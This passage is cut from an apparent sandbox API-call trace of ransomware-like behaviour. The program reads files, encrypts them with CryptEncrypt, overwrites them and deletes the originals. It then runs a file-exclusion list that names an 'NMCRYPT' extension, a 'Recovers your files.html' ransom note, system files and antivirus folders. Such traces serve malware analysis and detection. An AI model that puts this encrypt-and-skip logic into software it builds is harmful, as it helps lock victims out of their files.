lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.679] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.679] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.679] GetLastError () returned 0x0 [0152.679] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.679] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.679] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.679] GetLastError () returned 0x0 [0152.679] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.679] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.679] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.679] GetLastError () returned 0x0 [0152.679] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.679] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.679] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.679] GetLastError () returned 0x0 [0152.679] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.679] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.679] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.679] GetLastError () returned 0x0 [0152.679] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.679] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.679] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x110) returned 1 [0152.680] GetLastError () returned 0x0 [0152.680] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x110, lpOverlapped=0x0) returned 1 [0152.680] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x0, lpOverlapped=0x0) returned 1 [0152.680] WriteFile (in: hFile=0x588, lpBuffer=0x29012e0*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesWritten=0x2d7e15c*=0x0, lpOverlapped=0x0) returned 1 [0152.680] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\micaut.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\micaut.dll.mui")) returned 0x20 [0152.680] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\micaut.dll.mui", dwFileAttributes=0x20) returned 0 [0152.680] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\micaut.dll.mui") returned 1 [0152.680] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\micaut.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\micaut.dll.mui")) returned 0 [0152.681] wcscpy (in: _Dest=0x2d7dcb4, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\micaut.dll.mui" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\micaut.dll.mui") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\micaut.dll.mui" [0152.681] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\micaut.dll.mui" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US") returned 1 [0152.681] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7debc | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\.xXC777.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\.xxc777.tmp")) returned 0xc777 [0152.682] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\micaut.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\micaut.dll.mui"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\.xXC777.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\.xxc777.tmp"), dwFlags=0x1) returned 0 [0152.682] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\.xXC777.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\.xxc777.tmp")) returned 1 [0152.682] CryptDestroyKey (hKey=0x9ad2f8) returned 1 [0152.682] wcslen (_String="OK") returned 0x2 [0152.682] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0152.682] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0152.682] CryptDestroyKey (hKey=0x9ad178) returned 1 [0152.682] CryptDestroyHash (hHash=0x9ad278) returned 1 [0152.682] CryptReleaseContext (hProv=0x8e3330, dwFlags=0x0) returned 1 [0152.682] FindNextFileW (in: hFindFile=0x9ad438, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 1 [0152.682] PathMatchSpecW (pszFile="mip.exe.mui", pszSpec="*NMCRYPT") returned 0 [0152.682] PathMatchSpecW (pszFile="mip.exe.mui", pszSpec="*Recovers your files.html") returned 0 [0152.682] PathMatchSpecW (pszFile="mip.exe.mui", pszSpec="*.exe") returned 0 [0152.682] PathMatchSpecW (pszFile="mip.exe.mui", pszSpec="*.dll") returned 0 [0152.682] PathMatchSpecW (pszFile="mip.exe.mui", pszSpec="*.lnk") returned 0 [0152.682] PathMatchSpecW (pszFile="mip.exe.mui", pszSpec="*.bat") returned 0 [0152.682] PathMatchSpecW (pszFile="mip.exe.mui", pszSpec="*.ini") returned 0 [0152.682] PathMatchSpecW (pszFile="mip.exe.mui", pszSpec="*.msi") returned 0 [0152.682] PathMatchSpecW (pszFile="mip.exe.mui", pszSpec="*.scf") returned 0 [0152.683] PathMatchSpecW (pszFile="mip.exe.mui", pszSpec="*pagefile.sys*") returned 0 [0152.683] PathMatchSpecW (pszFile="mip.exe.mui", pszSpec="*NTUSER.DAT*") returned 0 [0152.683] PathMatchSpecW (pszFile="mip.exe.mui", pszSpec="*AppData*") returned 0 [0152.683] PathMatchSpecW (pszFile="mip.exe.mui", pszSpec="*\\winrar\\*") returned 0 [0152.683] PathMatchSpecW (pszFile="mip.exe.mui", pszSpec="*\\Internet Explorer\\*") returned 0 [0152.683] PathMatchSpecW (pszFile="mip.exe.mui", pszSpec="*\\java\\*") returned 0 [0152.683] PathMatchSpecW (pszFile="mip.exe.mui", pszSpec="*\\TeamViewer\\*") returned 0 [0152.683] PathMatchSpecW (pszFile="mip.exe.mui", pszSpec="*\\windows\\*") returned 0 [0152.683] PathMatchSpecW (pszFile="mip.exe.mui", pszSpec="*\\ESET\\*") returned 0 [0152.683] PathMatchSpecW (pszFile="mip.exe.mui", pszSpec="*\\AVG\\*") returned 0 [0152.683] PathMatchSpecW (pszFile="mip.exe.mui", pszSpec="*\\AVIRA\\*") returned 0 [0152.683] PathMatchSpecW (pszFile="mip.exe.mui", pszSpec="*\\AVAST Software\\*") returned 0 [0152.683] PathMatchSpecW (pszFile="mip.exe.mui", pszSpec="*Atheros*") returned 0 [0152.683] PathMatchSpecW (pszFile="mip.exe.mui", pszSpec="*Realtek*") returned 0 [0152.683] PathMatchSpecW (pszFile="mip.exe.mui", pszSpec="*bootmgr*") returned 0 [0152.683] PathMatchSpecW (pszFile="mip.exe.mui", pszSpec="*boot*") returned 0 [0152.683] PathMatchSpecW (pszFile="mip.exe.mui", pszSpec="*boot*") returned 0 [0152.683] PathMatchSpecW (pszFile="mip.exe.mui", pszSpec="*CONFIG.SYS*") returned 0 [0152.683] PathMatchSpecW (pszFile="mip.exe.mui", pszSpec="*IO.SYS*") returned 0 [0152.683] PathMatchSpecW (pszFile="mip.exe.mui", pszSpec="*MSDOS.SYS*") returned 0 [0152.683] PathMatchSpecW (pszFile="mip.exe.mui", pszSpec="*NTDETECT.COM*") returned 0 [0152.683] PathMatchSpecW (pszFile="mip.exe.mui", pszSpec="*ntldr*") returned 0 [0152.683] PathMatchSpecW (pszFile="mip.exe.mui", pszSpec="*chrome*") returned 0 [0152.683] PathMatchSpecW (pszFile="mip.exe.mui", pszSpec="*opera*") returned 0 [0152.683] PathMatchSpecW (pszFile="mip.exe.mui", pszSpec="*firefox*") returned 0 [0152.683] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\mip.exe.mui", pszSpec="*") returned 1 [0152.683] strlen (_Str="NMoreira") returned 0x8 [0152.683] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.683] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.683] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.683] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.683] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.683] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.683] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.683] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.683] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.683] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.683] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.683] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.683] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.683] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.683] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.683] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.683] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.683] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.683] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.683] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.684] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.684] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.684] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.684] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.684] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.684] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.684] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.684] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.684] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.684] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.684] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.684] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.684] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.684] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.684] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.684] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.684] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.684] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.684] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.684] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.684] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.684] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.684] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.684] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.684] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.684] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.684] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.684] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.684] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.684] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.684] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.684] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.684] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.684] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.684] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.684] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.684] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.684] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.684] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.684] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.684] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.684] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.684] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.684] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.684] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.684] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.684] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.684] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.684] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.684] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.685] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.685] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.685] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.685] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.685] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.685] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.685] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.685] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.685] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.685] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.685] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.685] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.685] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.685] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.685] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.685] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.685] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.685] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.685] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.685] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.685] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.685] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.685] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.685] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.685] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.685] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.685] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.685] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.685] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.685] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.685] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.685] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.685] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.685] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.685] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.685] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.685] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.685] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.685] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.685] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.685] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.685] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.685] CryptGenRandom (in: hProv=0x8bf310, 